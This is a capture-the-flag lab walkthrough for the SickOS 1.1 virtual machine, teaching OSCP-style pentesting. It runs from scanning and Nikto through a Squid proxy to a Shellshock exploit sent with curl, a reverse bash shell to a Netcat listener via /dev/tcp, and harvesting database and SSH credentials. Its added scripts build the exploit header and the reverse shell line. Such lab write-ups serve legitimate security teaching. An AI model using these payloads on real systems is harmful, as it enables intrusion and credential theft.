Lab - Capture The Flag - SickOS 1.1
Overview
In this lab, you will be shown how to gain root access to a virtual machine designed as a
Capture the Flag (CTF) exercise. This CTF is rated as easy. These walk-throughs are designed
so students can learn by emulating the technical steps used in conducting a real-world
pentest, using as few automated tools as possible.
This CTF is similar to the labs found in the OSCP exam course. The objective is to compromise
the target and gain administrative/root privileges. Manual hacking techniques are used
wherever possible; the use of automated tools has been kept to an absolute minimum.
Caveat
VirtualBox was used to run the target machine. Kali Linux is the attacker machine for solving
this CTF.
CTF Description
Difficulty: Easy
DHCP: Enabled
IP Address: Automatically assigned
Footprinting
We begin by conducting an active scan of the network. First, we identify our own IP address
and that of the target, then we scan the target for any open ports or exploitable services.
© 2018 syberoffense.com All Rights Reserved
We next need to fingerprint the target to learn what ports and services are available. For this,
we run Nmap against the target.
The Nmap scan shows a Squid HTTP proxy on port 3128 and that port 8080 (HTTP) is closed. A
proxy like this normally sits in front of a web server, so there is most probably a website
behind it that we can reach by sending our requests through the proxy.
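The discovery and scan steps above, as an added shell example that is not part of the original walkthrough. It assumes the page's target address 192.168.0.102, a Kali interface named eth0, and a constructed sample of Nmap's greppable output (the page's own scan result is only shown as a screenshot); the parser pulls the open ports out of that format so the list can be reused in later commands.

```shell
#!/bin/sh
# Added example, not the walkthrough's own commands: find our address, sweep
# the lab network, scan the target, and parse Nmap's greppable output.
# Assumptions: the page's target 192.168.0.102 and a Kali interface eth0.
KALI_IF="${KALI_IF:-eth0}"
SICKOS_IP="${SICKOS_IP:-192.168.0.102}"

# Our own IPv4 address on the lab interface (the "identify our" step).
my_ip() {
  ip -4 -o addr show dev "$KALI_IF" | awk '{print $4}' | cut -d/ -f1
}

# Live hosts on a /24 from a ping/ARP sweep (no port scan yet).
discover_hosts() {
  nmap -sn -oG - "$1" | awk '/Status: Up/ {print $2}'
}

# Full TCP port scan with version detection, kept as greppable output.
# -sS needs root; use -sT for an unprivileged scan.
scan_target() {
  nmap -sS -sV -p- -oG "scan_$1.gnmap" "$1" >/dev/null
  cat "scan_$1.gnmap"
}

# Reduce a greppable "Ports:" line to one "port/service" per open port.
# Each entry is port/state/proto/owner/service/rpcinfo/version/.
open_ports_from_grepable() {
  awk -F'Ports: ' '/Ports:/ {
    n = split($2, entry, ", ")
    for (i = 1; i <= n; i++) {
      split(entry[i], f, "/")
      if (f[2] == "open") print f[1] "/" f[5]
    }
  }'
}

# Constructed sample of what -oG produced for this box (versions omitted):
# SSH and Squid open, 8080 closed, everything else filtered.
SAMPLE_GNMAP='# Nmap scan (constructed sample)
Host: 192.168.0.102 ()  Status: Up
Host: 192.168.0.102 ()  Ports: 22/open/tcp//ssh//OpenSSH/, 3128/open/tcp//http-proxy//Squid http proxy/, 8080/closed/tcp//http///  Ignored State: filtered (65532)
# Nmap done'

if [ "${1:-}" = "live" ]; then
  echo "attacker: $(my_ip)"
  discover_hosts "${SICKOS_IP%.*}.0/24"
  scan_target "$SICKOS_IP" | open_ports_from_grepable
else
  printf '%s\n' "$SAMPLE_GNMAP" | open_ports_from_grepable
fi
```

Run it with the argument live (as root, since -sS needs raw sockets) to perform the real sweep and scan; with no argument it only parses the embedded sample and prints 22/ssh and 3128/http-proxy.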
We can run Nikto through the proxy (the -useproxy switch) to look for any vulnerabilities on the web server.
Command used: nikto -h 192.168.0.102 -useproxy http://192.168.0.102:3128
Nikto reports that the server is vulnerable to Shellshock. Shellshock is a bug in the way bash
(the Bourne-Again SHell) imports function definitions from environment variables: bash keeps
parsing past the end of the function body and executes whatever follows it. Because a web
server passes request headers such as User-Agent to CGI scripts as environment variables, an
attacker can remotely execute arbitrary commands on the machine.
To get access to the website, we need to point Firefox in Kali at the Squid proxy. Launch Firefox
and go to Edit > Preferences > Network Proxy > Settings, then enter the target IP with port 3128
as the HTTP proxy. Once you click OK and save the proxy settings, type the IP address of the
target into the address bar and you are given the home page for the website.
Let’s check the page source for any useful information. Nothing of use here.
From our Nikto scan, we learned of a robots.txt file. Let’s look at that.
Examination of the Wolf CMS install turns up nothing useful. We can now run the Shellshock
exploit (CVE-2014-6271 and CVE-2014-6278) against the site. Doing so will allow us to establish
a reverse shell. First start a Netcat listener and leave it up and running.
Command used: nc -lvnp 4444
From our Kali machine, we open a second terminal and run the following cURL command.
Note: this command is configured with my target and Kali IP information; your IP information
will probably differ.
We use the -x switch to send the request through the HTTP proxy, and the -H switch to supply
a crafted User-Agent header. The code carried in that header is a reverse TCP bash shell,
which connects back to our listener.
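The Shellshock request described above, as an added example rather than the command from the original page (which is only shown as a screenshot). It assumes the page's addresses (target 192.168.0.102, Squid on port 3128, listener on port 4444), an attacker address of 192.168.0.100, and a CGI path of /cgi-bin/status; the page does not reproduce the path Nikto reported, so that value is a placeholder to replace with the real one. It adds a harmless probe to confirm the bug before sending the reverse shell, plus a local check for a vulnerable bash.

```shell
#!/bin/sh
# Added example, not the walkthrough's own command: build the Shellshock
# (CVE-2014-6271) request that goes through the Squid proxy to a CGI script.
# Assumptions: the page's IPs/ports below, attacker 192.168.0.100, and the
# CGI path /cgi-bin/status (placeholder; use the path Nikto reported).
SICKOS_IP="${SICKOS_IP:-192.168.0.102}"
SQUID_PROXY="${SQUID_PROXY:-http://$SICKOS_IP:3128}"
CGI_PATH="${CGI_PATH:-/cgi-bin/status}"   # assumption, see lead-in
KALI_IP="${KALI_IP:-192.168.0.100}"       # assumption: our listener host
LPORT="${LPORT:-4444}"                    # matches nc -lvnp 4444

# The exploit string: an empty function definition followed by a command.
# A vulnerable bash keeps parsing past the "}" when it imports the env var
# that the web server builds from the User-Agent header, and runs the rest.
shellshock_header() {
  printf 'User-Agent: () { :; }; %s' "$1"
}

# Probe: emit a minimal CGI response so the command output lands in the
# HTTP body. If "vulnerable" and an id line come back, the target is hit.
probe_payload() {
  printf 'echo Content-Type: text/plain; echo; echo vulnerable; /usr/bin/id'
}

# Reverse shell: the CGI environment has a bare PATH, so use absolute paths.
revshell_payload() {
  printf '/bin/bash -i >& /dev/tcp/%s/%s 0>&1' "$KALI_IP" "$LPORT"
}

# Full curl invocation, printed rather than executed so it can be reviewed.
curl_command() {
  printf "curl -s -x %s -H '%s' http://%s%s\n" \
    "$SQUID_PROXY" "$(shellshock_header "$1")" "$SICKOS_IP" "$CGI_PATH"
}

# Local check: does the bash on THIS host honor the malicious export?
# Returns 0 (true) only for an unpatched bash.
bash_is_vulnerable() {
  out=$(env x='() { :; }; echo vulnerable' bash -c 'echo test' 2>/dev/null || true)
  case "$out" in *vulnerable*) return 0 ;; *) return 1 ;; esac
}

case "${1:-}" in
  probe) sh -c "$(curl_command "$(probe_payload)")" ;;
  shell) sh -c "$(curl_command "$(revshell_payload)")" ;;
  *)     curl_command "$(probe_payload)"
         curl_command "$(revshell_payload)" ;;
esac
```

Start the listener first (nc -lvnp 4444), run the script with probe and look for the word vulnerable and the output of id in the reply, then run it with shell; the reverse shell lands in the listener window. With no argument it only prints the two curl commands for review. The same bash_is_vulnerable check can be run on the target once you have a shell, to confirm what you exploited.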
We next change directory to the wolfcms folder and list its contents to see what we can find.
Our target of interest here is the config.php file, which holds the database credentials. We
can view its contents using the cat command.
In a new terminal we attempt to connect to the SQL database from Kali, but the connection
fails (the Nmap scan showed no exposed database port, so MySQL is most likely bound to
localhost on the target and only reachable from a shell on the box). We return to the reverse
shell and use the cat command to print out the contents of /etc/passwd.
We see the user sickos. We open a second terminal and attempt to log in to the target over
SSH as sickos, trying the password we found earlier in config.php, john@123, in case it has
been reused for the local account. It has.
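The credential-harvesting steps above (config.php, then /etc/passwd, then password reuse over SSH), as an added example rather than the walkthrough's own commands. The config.php and passwd contents are constructed samples: john@123 is the password the page reports, while the DSN, the database user name and the other accounts are placeholders.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: after the reverse shell,
# pull the database credentials out of Wolf CMS's config.php and list the
# local accounts that can actually log in, to test for password reuse.
# Both files below are constructed samples; only john@123 comes from the page.

SAMPLE_CONFIG="<?php
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');
"

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
'

# Extract PHP define('NAME', 'value') pairs for the DB_* constants as
# NAME=value lines (single- or double-quoted values).
db_creds() {
  sed -n "s/^[[:space:]]*define([[:space:]]*['\"]\(DB_[A-Z_]*\)['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1=\2/p"
}

# The DSN carries the database host. "localhost" means the server is only
# reachable from the box itself, which is why a connection from Kali fails
# while "mysql -u USER -p" from the reverse shell would work.
db_host() {
  db_creds | sed -n 's/^DB_DSN=.*host=\([^;]*\).*/\1/p'
}

# Accounts with a real login shell, i.e. where a reused password could be
# tried over SSH: UID 0 or >= 1000 and a shell that is not nologin/false.
login_users() {
  awk -F: '($3 == 0 || $3 >= 1000) && $7 !~ /(nologin|false)$/ {print $1 ":" $7}'
}

echo "database credentials:"
printf '%s' "$SAMPLE_CONFIG" | db_creds
echo "database host: $(printf '%s' "$SAMPLE_CONFIG" | db_host)"
echo "accounts to try the password against:"
printf '%s' "$SAMPLE_PASSWD" | login_users
```

From the reverse shell, run the functions on the real files (cat config.php | db_creds; login_users < /etc/passwd). Every account the second function prints is a candidate for the recovered password, which here leads to ssh sickos@192.168.0.102.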
Logged in as sickos, let’s escalate to root on the target.
Let’s list the directory contents and see what permissions they have.
Summary –
We captured this flag in short order. This CTF was easy, and it provided some good insight
into how the OSCP labs are structured.
The biggest takeaway was learning about the Shellshock vulnerability and how to exploit it.
Methodology Used:
Host discovery and Nmap port/service scan (Squid proxy on 3128, 8080 closed)
Nikto web scan sent through the Squid proxy
Shellshock (CVE-2014-6271, CVE-2014-6278) via a crafted User-Agent header sent with cURL through the proxy
Reverse bash shell to a Netcat listener
Credential harvesting from the Wolf CMS config.php and user enumeration from /etc/passwd
SSH login as sickos with the reused password, then escalation to root
Regards –
Prof. k